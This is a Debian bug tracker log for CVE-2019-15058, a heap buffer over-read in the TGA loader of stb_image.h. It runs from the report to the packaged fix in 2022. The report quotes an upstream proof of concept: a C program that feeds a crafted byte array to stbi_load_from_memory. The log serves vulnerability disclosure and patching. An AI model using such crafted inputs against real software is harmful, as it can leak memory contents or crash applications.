Debian Bug report logs - #934973
libstb: CVE-2019-15058

version graph

Package: src:libstb; Maintainer for src:libstb is Yangfl <mmyangfl@gmail.com>;

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Sat, 17 Aug 2019 14:15:02 UTC

Severity: important

Tags: fixed-upstream, security, upstream

Found in version libstb/0.0~git20190617.5.c72a95d-2

Fixed in version libstb/0.0~git20210910.af1a5bc+ds-1

Done: Yangfl <mmyangfl@gmail.com>

Bug is archived. No further changes may be made.

Forwarded to https://github.com/nothings/stb/issues/790

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, team@security.debian.org, Yangfl <mmyangfl@gmail.com>:
Bug#934973; Package src:libstb. (Sat, 17 Aug 2019 14:15:05 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, team@security.debian.org, Yangfl <mmyangfl@gmail.com>. (Sat, 17 Aug 2019 14:15:05 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: libstb: CVE-2019-15058
Date: Sat, 17 Aug 2019 16:11:48 +0200
Source: libstb
Version: 0.0~git20190617.5.c72a95d-2
Severity: important
Tags: security upstream
Forwarded: https://github.com/nothings/stb/issues/790

Hi,

The following vulnerability was published for libstb.

CVE-2019-15058[0]:
| stb_image.h (aka the stb image loader) 2.23 has a heap-based buffer
| over-read in stbi__tga_load, leading to Information Disclosure or
| Denial of Service.

The reproduce the issue, upstream issue provides a poc:

|#define STBI_WINDOWS_UTF8
|#define STB_IMAGE_WRITE_IMPLEMENTATION
|#include "stb_image_write.h"
|#define STB_IMAGE_IMPLEMENTATION
|#include "stb_image.h"
|#define STB_DEFINE
|#include "stb.h"
|#include<stdio.h>
|#include<stdlib.h>
|unsigned char data[] =
|{
|  0xAF, 0x01, 0x09, 0x00, 0x00, 0x00, 0x00, 0x10, 0x14, 0x0A,
|  0xAF, 0x00, 0xEF, 0xEF, 0xEF, 0x11, 0x10, 0xEF, 0xEB, 0xF5,
|  0x50, 0xFE, 0xFE, 0x09
|};
|int main(int argc, char **argv)
|{
|    int x,y,n;
|    stbi_load_from_memory(data,sizeof(data),&x,&y,&n,4);
|    return 0;
|}

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-15058
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15058
[1] https://github.com/nothings/stb/issues/790

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Added tag(s) fixed-upstream. Request was from debian-bts-link@lists.debian.org to control@bugs.debian.org. (Mon, 05 Jul 2021 17:21:24 GMT) (full text, mbox, link).


Reply sent to Yangfl <mmyangfl@gmail.com>:
You have taken responsibility. (Sun, 23 Jan 2022 16:09:07 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Sun, 23 Jan 2022 16:09:07 GMT) (full text, mbox, link).


Message #12 received at 934973-close@bugs.debian.org (full text, mbox, reply):

From: Debian FTP Masters <ftpmaster@ftp-master.debian.org>
To: 934973-close@bugs.debian.org
Subject: Bug#934973: fixed in libstb 0.0~git20210910.af1a5bc+ds-1
Date: Sun, 23 Jan 2022 16:06:16 +0000
Source: libstb
Source-Version: 0.0~git20210910.af1a5bc+ds-1
Done: Yangfl <mmyangfl@gmail.com>

We believe that the bug you reported is fixed in the latest version of
libstb, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 934973@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Yangfl <mmyangfl@gmail.com> (supplier of updated libstb package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sun, 23 Jan 2022 16:57:05 +0800
Source: libstb
Architecture: source
Version: 0.0~git20210910.af1a5bc+ds-1
Distribution: unstable
Urgency: medium
Maintainer: Yangfl <mmyangfl@gmail.com>
Changed-By: Yangfl <mmyangfl@gmail.com>
Closes: 934973
Changes:
 libstb (0.0~git20210910.af1a5bc+ds-1) unstable; urgency=medium
 .
   * New upstream snapshot
     + Fix CVE-2019-15058 (Closes: #934973)
   * Bump Standards-Version to 4.6.0
   * Add upstream metadata
Checksums-Sha1:
 f72168ca05b9fd5f42836084c3f9da88260e3f6e 2061 libstb_0.0~git20210910.af1a5bc+ds-1.dsc
 cdd6eb6ed61dcacb7508540fb97ccf77a776fe27 1083908 libstb_0.0~git20210910.af1a5bc+ds.orig.tar.xz
 d4b6c57ce292be17df612c679d6de9029584b605 14676 libstb_0.0~git20210910.af1a5bc+ds-1.debian.tar.xz
 15f562cd94bd06fd4b6203510fb131dc7868230c 6653 libstb_0.0~git20210910.af1a5bc+ds-1_amd64.buildinfo
Checksums-Sha256:
 675190d2a6ac1e153e269a173cdee610eeb3bf6f01c6fb0f5065a237a3dfdfc5 2061 libstb_0.0~git20210910.af1a5bc+ds-1.dsc
 042ae97ce73385a4b43a8d9615869eebc2187afa17689fe312b4a5b60da2044a 1083908 libstb_0.0~git20210910.af1a5bc+ds.orig.tar.xz
 a68cf532d42284c4ef1a26a2ed62bc0cdab18917872c68d153e2603b7eeeb3fe 14676 libstb_0.0~git20210910.af1a5bc+ds-1.debian.tar.xz
 4912b726410ee9707ae574644c6bcd703591c37c90dc79fd7623cf0f80b9cf77 6653 libstb_0.0~git20210910.af1a5bc+ds-1_amd64.buildinfo
Files:
 fa3d1dedfc4d29916896da025b017b31 2061 libs optional libstb_0.0~git20210910.af1a5bc+ds-1.dsc
 93bd7392a0f241d1e49c5d947feacd6e 1083908 libs optional libstb_0.0~git20210910.af1a5bc+ds.orig.tar.xz
 aa7f86e473d6778b1e5d3f44f9f997d9 14676 libs optional libstb_0.0~git20210910.af1a5bc+ds-1.debian.tar.xz
 d6ad87229776cb18feb482a6d97dca10 6653 libs optional libstb_0.0~git20210910.af1a5bc+ds-1_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEfncpR22H1vEdkazLwpPntGGCWs4FAmHteiwACgkQwpPntGGC
Ws6ZDQ/5AYw8S6JC5sCY+H4nZo7dR0b/+R6hCxGWxo8s50JqdaQrQ2IxcAXo+JpZ
TXmHDSRLh+CHfraYflrxkb7v6Dn8I5TVfQWg052F6W9Gi+te5Vy57cWNZKDPggiy
7iy7LTA/9XWPbDKLXxPhif0atdEltjFpMr44GL7aDFmD7AyteNuvdLUif2nVd9vp
Xu1dOoRyVQqQ0MLDArs3NWvXr8TIzc3fqNhj3Degys7qt4R7gbU3lTgmiw+r9cAv
ds35G/MJzh4StCfACIX8E+wZM++xRLAoeHixRGtaHr8J274KbQMPE56qgyO/afC7
+2n1ZzIS5IeTwOW10uIiDn/JPjVYWTl/LociKztE/TymBLql2BTf5T9mSiT0+XrK
g3z5yugt6zWiZ/eOzT/cLz2ksDF9C0gkPhhxCStXu+C58bcKhwrwpUZosNKT4vMd
Q3qTWJmzCk8iRjOToF4JD1e+3bGD6Pb0U926TfDihlU9ID545PyLJmgt0QVCAaJT
0udaaz+BVDFvrYKcWyRuBZWiZVE8XIoj7R3BlrsEPBPJKiPOdbHLRwdc+ig5DS75
sR/eJYbRb+wOmDQ/vJFEfFEGXmkNFKMNKjDFE+PCWr1jvN421wUFoL949Fo0e8jd
oLCMnAJZXOf7iQhkYwFZXDeu/Q5ZadtCnoTIqhmC+Zneqz1aB7I=
=MVpV
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 26 Feb 2022 07:31:03 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Aug 2 01:08:36 2024; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.